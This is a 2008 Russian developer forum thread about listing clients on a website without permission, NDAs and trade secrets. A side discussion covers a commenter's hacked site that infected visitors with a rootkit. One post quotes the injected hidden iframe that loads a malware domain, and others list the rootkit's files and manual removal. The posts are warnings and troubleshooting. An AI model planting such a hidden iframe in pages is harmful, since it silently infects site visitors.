ASX>у кого спрашивать? ASX>ты представляешь уровень бюрократизма в такой конторе, это надо пройти 27 юристов, и подписать 48 соглашений
Покупает-то конкретное лицо. Вот у него и спрашивать. Часто ответ будет сразу — "нет", потому что в крупных компаниях на это есть ясные инструкции. Но известные, но менее крупные фирмы могут и дать разрешение.
С другой стороны, можно и просто выкладывать имена туда, убирая их по запросу.
Здравствуйте, grigsoft, Вы писали:
G>Покупает-то конкретное лицо. Вот у него и спрашивать. Часто ответ будет сразу — "нет"
Скорее всего так и будет, но даже если он скажет "да", то что от этого меняется?
Поэтому, если есть острое желание сделать такой вот список клиентов, то делать, его, а при первом требовании убирать.
Здравствуйте, BoberPlus, Вы писали:
BP>Здравствуйте, Аноним, Вы писали:
А>>Здравствуйте, Grayscaler, Вы писали:
G>>>Здравствуйте, Аноним, Вы писали:
А>>>>sbrige.dll и sbunit.sys лежат в windows\system32. Но не выходя из системы их не удалить, они скрыты руткитом. Я в другую операционку перезагружался чтобы это сделать.
G>>>Что-то не заметил ничего ни в памяти, ни на диске. Или все эти файлы только под другой операционкой видно?
А>>Как память то проверял? Надо список загруженных модулей в процессах смотреть. Если было заражение, то указанные выше файлы полностью скрыты от всех приложений, в смысле не видно их на диске вообще ни откуда. Кстати сайт я через Firefox 3 пытался открыть, поэтому если у тебя браузер другой возможно ничего страшного и не произошло.
BP>Касперский вроде как умеет руткиты искать
Угу, известные руткиты и вирусы они находить умеют. А как только встречается такой вот самопал, так оказывается что антивирус его не распознает, и разрекламированные гиперпуперактивные защиты расписываются в логах в своей бесполезности. Потому много лет пользуюсь набором head+hands. Систему не тормозит, 0 ложных срабатываний, лечит даже неизвестную науке цифрогадость
Всем привет.
На сайтах некоторых разработчиков встречал страницу со списком клиентов. Идея мне понравилась, классно ведь когда какой-нибудь Сони или Мерседес — клиент. Одно смущает, вдруг клиенты против своего упоминания? Поделитесь соображениями, плиз.
Спасибо
Здравствуйте, okurtsev, Вы писали:
O>Всем привет. O>На сайтах некоторых разработчиков встречал страницу со списком клиентов. Идея мне понравилась, классно ведь когда какой-нибудь Сони или Мерседес — клиент. Одно смущает, вдруг клиенты против своего упоминания? Поделитесь соображениями, плиз. O>Спасибо
Здравствуйте, ironwit, Вы писали:
I>что мешает спросить у клиентов?
у кого спрашивать?
ты представляешь уровень бюрократизма в такой конторе, это надо пройти 27 юристов, и подписать 48 соглашений
Re[3]: Страница клиентов
От:
Аноним
Дата:
28.10.08 09:44
Оценка:
Здравствуйте, ASX, Вы писали:
ASX>Здравствуйте, ironwit, Вы писали:
I>>что мешает спросить у клиентов?
ASX>у кого спрашивать? ASX>ты представляешь уровень бюрократизма в такой конторе, это надо пройти 27 юристов, и подписать 48 соглашений
как раз вопрос о том, можно ли, не спрашивая их, это сделать, ведь не хочется дергать никого лишний раз. Может быть это вообще норма. А может и нет, вдруг они стесняюся того, что они такие крутые и пользуются твоим софтом.
Здравствуйте, ASX, Вы писали:
ASX>Здравствуйте, Grayscaler, Вы писали:
G>>Ответ не по теме, но сайт в вашей подписи похоже хакнут. После загрузки редиректит на какое-то детское порно.
ASX>Угу и касперыч жутко ругается, говорит есть ссылка на фишинговый сайт
аналогично
Re[2]: Страница клиентов
От:
Аноним
Дата:
28.10.08 12:01
Оценка:
Здравствуйте, Grayscaler, Вы писали:
G>Здравствуйте, okurtsev, Вы писали:
G>Ответ не по теме, но сайт в вашей подписи похоже хакнут. После загрузки редиректит на какое-то детское порно.
Все гораздо хуже! После захода на сайт через Firefox в памяти оказалась sbrige.dll, которая теперь лезет во все процессы, хукает WinInet и чето там пытается фильтровать. Я как раз отлаживался, заметил. Народ, не заходите пока на сайт из подписи топикстартера. Там похоже не просто редирект, а вирусняк который какие-то дырки в браузере пользует.
" Аноним 783 " <0@users.rsdn.ru> wrote in message news:3154693@news.rsdn.ru... > Все гораздо хуже! После захода на сайт через Firefox в памяти оказалась sbrige.dll, которая теперь лезет во все процессы, хукает WinInet и чето там пытается фильтровать. Я как раз отлаживался, заметил. Народ, не заходите пока на сайт из подписи топикстартера. Там похоже не просто редирект, а вирусняк который какие-то дырки в браузере пользует.
Ага, там вставка втихаря загружающая вирус (не кликайте):
[html]
<body><iframe src="http://NameBuyFilmLife.cn/in/" width=1 height=1 style="visibility: hidden"></iframe>
[/html]
Здравствуйте, Аноним, Вы писали:
А>Здравствуйте, Grayscaler, Вы писали:
G>>Здравствуйте, okurtsev, Вы писали:
G>>Ответ не по теме, но сайт в вашей подписи похоже хакнут. После загрузки редиректит на какое-то детское порно.
А>Все гораздо хуже! После захода на сайт через Firefox в памяти оказалась sbrige.dll, которая теперь лезет во все процессы, хукает WinInet и чето там пытается фильтровать. Я как раз отлаживался, заметил. Народ, не заходите пока на сайт из подписи топикстартера. Там похоже не просто редирект, а вирусняк который какие-то дырки в браузере пользует.
Какой Firefox ? и как эту гадость выковорить теперь ? У меня nod32 не ругнулся, похоже поймал заразу
Здравствуйте, BoberPlus, Вы писали:
BP>Здравствуйте, Аноним, Вы писали:
А>>Здравствуйте, Grayscaler, Вы писали:
G>>>Здравствуйте, okurtsev, Вы писали:
G>>>Ответ не по теме, но сайт в вашей подписи похоже хакнут. После загрузки редиректит на какое-то детское порно.
А>>Все гораздо хуже! После захода на сайт через Firefox в памяти оказалась sbrige.dll, которая теперь лезет во все процессы, хукает WinInet и чето там пытается фильтровать. Я как раз отлаживался, заметил. Народ, не заходите пока на сайт из подписи топикстартера. Там похоже не просто редирект, а вирусняк который какие-то дырки в браузере пользует.
BP>Какой Firefox ? и как эту гадость выковорить теперь ? У меня nod32 не ругнулся, похоже поймал заразу
Написал в поддержку, действительно хакнули, я прошу прощения у всех. Дописало какую-то дрянь в index.html и на русской и на английской страницах. Пока я так и не понял как это могло случиться и сколько это продолжалось не представляю.
Здравствуйте, okurtsev, Вы писали:
O>Написал в поддержку, действительно хакнули, я прошу прощения у всех. Дописало какую-то дрянь в index.html и на русской и на английской страницах. Пока я так и не понял как это могло случиться и сколько это продолжалось не представляю.
Либо через скрипты сайта (на всякий случай пни хостера, может у них сервак дырявый), либо у тебя комп заражен (при заливке файлов на сервак).
Re[4]: Страница клиентов
От:
Аноним
Дата:
28.10.08 13:44
Оценка:
Здравствуйте, BoberPlus, Вы писали:
BP>Здравствуйте, Аноним, Вы писали:
А>>Здравствуйте, Grayscaler, Вы писали:
G>>>Здравствуйте, okurtsev, Вы писали:
G>>>Ответ не по теме, но сайт в вашей подписи похоже хакнут. После загрузки редиректит на какое-то детское порно.
А>>Все гораздо хуже! После захода на сайт через Firefox в памяти оказалась sbrige.dll, которая теперь лезет во все процессы, хукает WinInet и чето там пытается фильтровать. Я как раз отлаживался, заметил. Народ, не заходите пока на сайт из подписи топикстартера. Там похоже не просто редирект, а вирусняк который какие-то дырки в браузере пользует.
BP>Какой Firefox ? и как эту гадость выковорить теперь ? У меня nod32 не ругнулся, похоже поймал заразу
Блин, еле поудалял руками. Антивирусы его не определяют. Это очень гнусный руткит, вот что у меня было:
— Оно записало в system32\drivers на место нормальных драйверов себя. Определить подмененный драйвер можно по длине 8624 байта.
— Вот еще его файлы:
msauc.exe
MTiCtwl.sys
wpv7890.cpx
sbrige.dll и sbunit.sys лежат в windows\system32. Но не выходя из системы их не удалить, они скрыты руткитом. Я в другую операционку перезагружался чтобы это сделать.
Какой-то б-ть соотечественник постарался. В msauc.exe поддельные строчки в ресурсах русские.
Здравствуйте, Аноним, Вы писали:
А>Здравствуйте, BoberPlus, Вы писали:
BP>>Здравствуйте, Аноним, Вы писали:
А>>>Здравствуйте, Grayscaler, Вы писали:
G>>>>Здравствуйте, okurtsev, Вы писали:
G>>>>Ответ не по теме, но сайт в вашей подписи похоже хакнут. После загрузки редиректит на какое-то детское порно.
А>>>Все гораздо хуже! После захода на сайт через Firefox в памяти оказалась sbrige.dll, которая теперь лезет во все процессы, хукает WinInet и чето там пытается фильтровать. Я как раз отлаживался, заметил. Народ, не заходите пока на сайт из подписи топикстартера. Там похоже не просто редирект, а вирусняк который какие-то дырки в браузере пользует.
BP>>Какой Firefox ? и как эту гадость выковорить теперь ? У меня nod32 не ругнулся, похоже поймал заразу
А>Блин, еле поудалял руками. Антивирусы его не определяют. Это очень гнусный руткит, вот что у меня было:
А>- Оно записало в system32\drivers на место нормальных драйверов себя. Определить подмененный драйвер можно по длине 8624 байта.
А>- Вот еще его файлы: А>msauc.exe А>MTiCtwl.sys А>wpv7890.cpx
А>sbrige.dll и sbunit.sys лежат в windows\system32. Но не выходя из системы их не удалить, они скрыты руткитом. Я в другую операционку перезагружался чтобы это сделать.
А>Какой-то б-ть соотечественник постарался. В msauc.exe поддельные строчки в ресурсах русские.
Если у вас в фаре или где-то еще были сохранены важные пароли на фтп, поменяйте их. Я в общем вроде разобрался как это произошло. в прошлую пятницу дома подцепил вирус, выкосил его довольно быстро. Но вот вчера какая-то дрянь воспользовалась паролем.
Здравствуйте, Аноним, Вы писали:
А>sbrige.dll и sbunit.sys лежат в windows\system32. Но не выходя из системы их не удалить, они скрыты руткитом. Я в другую операционку перезагружался чтобы это сделать.
Что-то не заметил ничего ни в памяти, ни на диске. Или все эти файлы только под другой операционкой видно?
Re[6]: Страница клиентов
От:
Аноним
Дата:
28.10.08 15:52
Оценка:
Здравствуйте, Grayscaler, Вы писали:
G>Здравствуйте, Аноним, Вы писали:
А>>sbrige.dll и sbunit.sys лежат в windows\system32. Но не выходя из системы их не удалить, они скрыты руткитом. Я в другую операционку перезагружался чтобы это сделать.
G>Что-то не заметил ничего ни в памяти, ни на диске. Или все эти файлы только под другой операционкой видно?
Как память то проверял? Надо список загруженных модулей в процессах смотреть. Если было заражение, то указанные выше файлы полностью скрыты от всех приложений, в смысле не видно их на диске вообще ни откуда. Кстати сайт я через Firefox 3 пытался открыть, поэтому если у тебя браузер другой возможно ничего страшного и не произошло.
Здравствуйте, Аноним, Вы писали:
А>Здравствуйте, Grayscaler, Вы писали:
G>>Здравствуйте, Аноним, Вы писали:
А>>>sbrige.dll и sbunit.sys лежат в windows\system32. Но не выходя из системы их не удалить, они скрыты руткитом. Я в другую операционку перезагружался чтобы это сделать.
G>>Что-то не заметил ничего ни в памяти, ни на диске. Или все эти файлы только под другой операционкой видно?
А>Как память то проверял? Надо список загруженных модулей в процессах смотреть. Если было заражение, то указанные выше файлы полностью скрыты от всех приложений, в смысле не видно их на диске вообще ни откуда. Кстати сайт я через Firefox 3 пытался открыть, поэтому если у тебя браузер другой возможно ничего страшного и не произошло.
Здравствуйте, Аноним, Вы писали:
А>Угу, известные руткиты и вирусы они находить умеют.
Касперыч эту гадость быстро выкупил. Этот вирус вроде как годичной давности.
А>А как только встречается такой вот самопал, так оказывается что антивирус его не распознает, и разрекламированные гиперпуперактивные защиты расписываются в логах в своей бесполезности. Потому много лет пользуюсь набором head+hands. Систему не тормозит, 0 ложных срабатываний, лечит даже неизвестную науке цифрогадость
Здравствуйте, ASX, Вы писали:
ASX>Здравствуйте, Аноним, Вы писали:
А>>Угу, известные руткиты и вирусы они находить умеют.
ASX>Касперыч эту гадость быстро выкупил. Этот вирус вроде как годичной давности.
Как выкусывал ? "Поиск руткитов" ? Или на лету поймал ?
Аноним 783 wrote: > редиректит на какое-то детское порно. Все гораздо хуже! После захода на > сайт через Firefox в памяти оказалась sbrige.dll, которая теперь лезет > во все процессы, хукает WinInet и чето там пытается фильтровать. Я как > раз отлаживался, заметил. Народ, не заходите пока на сайт из подписи
Здравствуйте, grigsoft, Вы писали:
ASX>>у кого спрашивать? ASX>>ты представляешь уровень бюрократизма в такой конторе, это надо пройти 27 юристов, и подписать 48 соглашений
G>Покупает-то конкретное лицо. Вот у него и спрашивать. Часто ответ будет сразу — "нет", потому что в крупных компаниях на это есть ясные
вы применяете чей то раскрученый бренд для своей рекламы, это как минимум требует утверждения а как максимум — оплаты. так что ИМХО при некотором невезении можно нарваться на проблемы.
Здравствуйте, ASX, Вы писали:
ASX>Здравствуйте, BoberPlus, Вы писали:
BP>>Как выкусывал ? "Поиск руткитов" ? Или на лету поймал ?
ASX>На лету, не дал загрузить. Вот сейчас еще раз зашел:
ASX>
А я, блин, похоже схватил. У меня касперский был выключен.
Здравствуйте, Аноним, Вы писали:
А>Как память то проверял? Надо список загруженных модулей в процессах смотреть. Если было заражение, то указанные выше файлы полностью скрыты от всех приложений, в смысле не видно их на диске вообще ни откуда. Кстати сайт я через Firefox 3 пытался открыть, поэтому если у тебя браузер другой возможно ничего страшного и не произошло.
Смотрел список модулей. Потом загрузился с сидюка и файлы искал. Нет ничего похожего. Firefox 3.0.3, Win Vista. Может оно разным людям разные руткиты раздает?
Re[8]: Страница клиентов
От:
Аноним
Дата:
29.10.08 10:44
Оценка:
Здравствуйте, Grayscaler, Вы писали:
G>Здравствуйте, Аноним, Вы писали:
А>>Как память то проверял? Надо список загруженных модулей в процессах смотреть. Если было заражение, то указанные выше файлы полностью скрыты от всех приложений, в смысле не видно их на диске вообще ни откуда. Кстати сайт я через Firefox 3 пытался открыть, поэтому если у тебя браузер другой возможно ничего страшного и не произошло.
G>Смотрел список модулей. Потом загрузился с сидюка и файлы искал. Нет ничего похожего. Firefox 3.0.3, Win Vista. Может оно разным людям разные руткиты раздает?
В Висте от атак основанных на переполнении буфера ASLR спасает (правда только те процессы которые с NX битом собраны, последние версии браузеров вроде все такие). Это в XP с выключенным DEP Firefox 3.0.1 для вируса оказался сладкой булочкой. И на старуху бывает порнуха как говорится
Re[5]: Ребяты, не ходите в инет под админскими логинами
Здравствуйте, Аноним, Вы писали:
BP>>Какой Firefox ? и как эту гадость выковорить теперь ? У меня nod32 не ругнулся, похоже поймал заразу
А>Блин, еле поудалял руками. Антивирусы его не определяют. Это очень гнусный руткит, вот что у меня было: А>- Оно записало в system32\drivers на место нормальных драйверов себя. Определить подмененный драйвер можно по длине 8624 байта.
А>- Вот еще его файлы: А>msauc.exe А>MTiCtwl.sys А>wpv7890.cpx
А>sbrige.dll и sbunit.sys лежат в windows\system32. Но не выходя из системы их не удалить, они скрыты руткитом. Я в другую операционку перезагружался чтобы это сделать.
А>Какой-то б-ть соотечественник постарался. В msauc.exe поддельные строчки в ресурсах русские.
Года три назад у меня тоже было как-то. Причем даже нажимать ничего не пришлось, просто зашел на _совершенно легальный_ сайт хайтек журнала. Села какая-то дрянь. Спасибо AVG хоть взвыл. Взвыть взвыл, но удалить не смог.
Три часа жизни отдал на ручное выковыривание этой дряни.
С тех пор работаю тока под юзерскими эккаунтами. Вроде (тьху-тьху-тьху) подобной тяжести случаев больше не повторялось. Вирусня лезет конечно, но бьется она
штатно, в рабочем режиме.
Здравствуйте, UCoder, Вы писали:
O>>На сайтах некоторых разработчиков встречал страницу со списком клиентов. Идея мне понравилась, классно ведь когда какой-нибудь Сони или Мерседес — клиент. Одно смущает, вдруг клиенты против своего упоминания? Поделитесь соображениями, плиз.
UC>Никогда не делайте так без разрешения.
Но почему?
Что мешает мне говорить когда захочу: «А я как-то делал работу для „Квазар—Микро“»? Что мешает писать то же на сайте, в подписи на форуме, на стене в туалете? Пока это правда, что в этом незаконного?
RO>Что мешает мне говорить когда захочу: «А я как-то делал работу для „Квазар—Микро“»? Что мешает писать то же на сайте, в подписи на форуме, на стене в туалете? Пока это правда, что в этом незаконного?
NDA или pryvacy policy если оно есть, в случае с клиентами на сайте.
Здравствуйте, UCoder, Вы писали:
UC>Реальный случай (Украина): Знакомый работал на фирме с NDA. Потом уволился, искал новую работу, включив в резюме эту фирму. Вскоре ему позвонил адвокат с фирмы, потребовал приехать в главный офис в другой город за 100+ км.. там долго выясняли отношения, "попугали" и отпустили. Понятно, что ему вряд ли что-то грозило реально, но все равно неприятно.
Здравствуйте, UCoder, Вы писали:
UC>Реальный случай (Украина): Знакомый работал на фирме с NDA.
Глупость какая-то, кроме NDA, как ни странно, есть еще законодательство, в котором, я что-то не встречал запрета упоминать о прошлом месте работы.
Поэтому таких адвокатов посылать нахер.
Естественно, что если человек брал на себя обязательства, то он должен их выполнять. Но почему, например, автор ПО, используемого гуглом, не имеет права обнародовать этот факт?
Здравствуйте, UCoder, Вы писали:
UC>Он в резюме еще упомянул проекты, над которыми работал в фирме (просто название + используемые технологии, без подробностей). За это его и взяли
А вот это уже совсем другое дело, это может попасть под коммерческую тайну.
RO>> Но почему, например, автор ПО, используемого гуглом, не имеет права обнародовать этот факт?
UC>это вполне может быть их коммерческой тайной
Как автор ПО, используемого яхой и прочими гуглами, я не постеснялся обнародовать этот факт. И знаете что — им глубоко на..рать. При расценках их адвокатов от $500 в час и выше, у них есть более интересные объекты для наездов, чем 10 тыщ шароварных сайтишек с нарушениями GuideLines по использованию Благородных Логотипов. Если каждого учить, что надо писать Microsoft(R) Windows(r) XP(R) — они разорятся.
